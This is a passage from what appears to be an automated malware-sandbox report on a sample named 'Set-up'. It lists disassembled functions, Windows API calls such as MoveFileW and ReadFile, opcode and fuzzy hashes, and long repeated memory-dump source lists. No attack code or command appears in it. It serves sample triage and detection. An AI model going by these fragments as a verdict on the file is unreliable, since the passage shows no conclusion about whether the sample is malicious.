                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: 7a6097228b40d4cd6126009fa436da3eacef3b3f64574c6a0a2d4114a6ed088b
                                                                                                                                  • Instruction ID: c1295f1a3412e825a5a9db1e37c7948b35807b1f9d7c9f76c5f1eb6f895c8d40
                                                                                                                                  • Opcode Fuzzy Hash: 7a6097228b40d4cd6126009fa436da3eacef3b3f64574c6a0a2d4114a6ed088b
                                                                                                                                  • Instruction Fuzzy Hash: 7E11A171904259DFCB15DFA8D809B9DBBF8FB09714F00026AE521E3384D7B46604CBA0
                                                                                                                                  Function 00F05BC0 Relevance: 6.0, APIs: 4, Instructions: 44threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131BE48,460C02D8,00000000), ref: 00F05BF8
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00F05C09
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00F05C33
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131BE48), ref: 00F05C44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterExceptionException@8LeaveRaiseThreadThrow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2345913246-0
                                                                                                                                  • Opcode ID: 491f00ff786a0114fe423a04303d2b14d0d632cb5a81ab064b8be9d4124aa1ed
                                                                                                                                  • Instruction ID: 0dc5486901f4c8ea3a5212211de1f1dc3e95c2c42af7cce4e09e839ee7d822cd
                                                                                                                                  • Opcode Fuzzy Hash: 491f00ff786a0114fe423a04303d2b14d0d632cb5a81ab064b8be9d4124aa1ed
                                                                                                                                  • Instruction Fuzzy Hash: 0911E171D04248DFCB14CFA8D909B9EBBF8FB09714F00026AE410E3384D7B46604CBA0
                                                                                                                                  Function 00E66390 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b028ccb2e0fb4489a4ceecc5d7cec404ff104e26b57f1858adcb8492d5845042
                                                                                                                                  • Instruction ID: 8c92346ce844c4256cbe48d122fc3467792f0a53eee0d769cae493c76eeaf695
                                                                                                                                  • Opcode Fuzzy Hash: b028ccb2e0fb4489a4ceecc5d7cec404ff104e26b57f1858adcb8492d5845042
                                                                                                                                  • Instruction Fuzzy Hash: B4F0ECB26DC2040BEB1CE7747856D6F77848BB4398F04163AF22BD63D0F622E955C156
                                                                                                                                  Function 00E63EB0 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00E63EE5
                                                                                                                                  • GetConsoleOutputCP.KERNEL32 ref: 00E63F08
                                                                                                                                  • GetACP.KERNEL32 ref: 00E63F12
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E63F30
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$ConsoleEnterLeaveOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3197396585-0
                                                                                                                                  • Opcode ID: 5dc12903e342c9c0a91cd960521f5893982a68df4f37d92d87f1e9b6f68c0c1c
                                                                                                                                  • Instruction ID: e959fa323fa91c5f74a5b4c1e7d5b4ff77cea320d51ffc0d34b126f6aa3779b4
                                                                                                                                  • Opcode Fuzzy Hash: 5dc12903e342c9c0a91cd960521f5893982a68df4f37d92d87f1e9b6f68c0c1c
                                                                                                                                  • Instruction Fuzzy Hash: 02017570945284DFCB25CFB5E448758BFB8EB06729F10436EE825A37C9C7B52944CB51
                                                                                                                                  Function 00E6BEC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00E6BFB9
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E6C03B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastMove
                                                                                                                                  • String ID: MoveFileW()
                                                                                                                                  • API String ID: 55378915-1661149990
                                                                                                                                  • Opcode ID: 569610fc0c66c21f91fcdd914b835ad9ae72f4a980bf24ad610dc0ac3992a64c
                                                                                                                                  • Instruction ID: d38c579340c74801de85649cb9762f3f1e4df19d663c24d38dfc1f601563f115
                                                                                                                                  • Opcode Fuzzy Hash: 569610fc0c66c21f91fcdd914b835ad9ae72f4a980bf24ad610dc0ac3992a64c
                                                                                                                                  • Instruction Fuzzy Hash: 45514B70A05249EFDF14DFA5D958BAEBBF5BF04304F144069E411BB280D77A9A08CBA1
                                                                                                                                  Function 00E61014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetNumberOfConsoleInputEvents.KERNEL32(?), ref: 00E61033
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B99C), ref: 00E619D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleCriticalEventsInputLeaveNumberSection
                                                                                                                                  • String ID: :
                                                                                                                                  • API String ID: 1692730731-336475711
                                                                                                                                  • Opcode ID: e8dba247cce0ded63a73a23ed4f3cfd7ba8d0e0797c80d2ab6c418eb720f6c23
                                                                                                                                  • Instruction ID: d599e6147f8e3fbf0bab8683734f4ecfa1807819c1ac571b2e69ef139f330480
                                                                                                                                  • Opcode Fuzzy Hash: e8dba247cce0ded63a73a23ed4f3cfd7ba8d0e0797c80d2ab6c418eb720f6c23
                                                                                                                                  • Instruction Fuzzy Hash: D7412970E44288DEDF36DB64E4547EEBBB4AF51388F0820D9D455B3281DB305A88CB61
                                                                                                                                  Function 00E8D020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • new.LIBCMT ref: 00E8D031
                                                                                                                                    • Part of subcall function 00E8D4A0: Concurrency::cancel_current_task.LIBCPMT ref: 00E8D50C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task
                                                                                                                                  • String ID: !af_$ncvector<unsigned long>::push_back
                                                                                                                                  • API String ID: 118556049-784343616
                                                                                                                                  • Opcode ID: aba00813030652204f0189f98b5eb4e7fbf0d0efbab27c872d1d4a4ad5cd47d9
                                                                                                                                  • Instruction ID: 97a403adbd200478092349ea3f9baad944dbaf53ba1076efc94558fa0cd0dabc
                                                                                                                                  • Opcode Fuzzy Hash: aba00813030652204f0189f98b5eb4e7fbf0d0efbab27c872d1d4a4ad5cd47d9
                                                                                                                                  • Instruction Fuzzy Hash: 1411E771954219AFCB24EF58DC02F9AB7ECEB05B24F00026AF924A73C1DBB169008790
                                                                                                                                  Function 00E58110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • ncvector<class CmdLine::ItemData>::push_back, xrefs: 00E581A2
                                                                                                                                  • !af_, xrefs: 00E581A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$ncvector<class CmdLine::ItemData>::push_back
                                                                                                                                  • API String ID: 0-1819047494
                                                                                                                                  • Opcode ID: 56c84d16f12a0b2559617c74d8a73b00f6971282303956698a207da5bf74ef4e
                                                                                                                                  • Instruction ID: 87c396f00362c1281f45a170681403dc510efe533a6899d3e650c1ab5a1a0a7e
                                                                                                                                  • Opcode Fuzzy Hash: 56c84d16f12a0b2559617c74d8a73b00f6971282303956698a207da5bf74ef4e
                                                                                                                                  • Instruction Fuzzy Hash: C901D2B1A44649EFDB24DF54D902B69B7E8E714B24F10466EED11A77C0EB762A00CB90
                                                                                                                                  Function 00E4D400 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • ncvector<class basic_ncstring<wchar_t> >::push_back, xrefs: 00E4D492
                                                                                                                                  • !af_, xrefs: 00E4D497
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$ncvector<class basic_ncstring<wchar_t> >::push_back
                                                                                                                                  • API String ID: 0-799122685
                                                                                                                                  • Opcode ID: 39c35b83d6a2b092523cea4c9907369db9f4effa3feeb9eedb877f6a9c54e1b6
                                                                                                                                  • Instruction ID: 26f9473d20c0ce62f26063e3c5f1eec87e9df5433422767a0c62026087a49a81
                                                                                                                                  • Opcode Fuzzy Hash: 39c35b83d6a2b092523cea4c9907369db9f4effa3feeb9eedb877f6a9c54e1b6
                                                                                                                                  • Instruction Fuzzy Hash: 3701DDB1A58248AFD724DF54EC11B99F7E8E714724F10467FE860A77C0EBB5691087D0
                                                                                                                                  Function 00E486B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 00E486EB
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E486F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
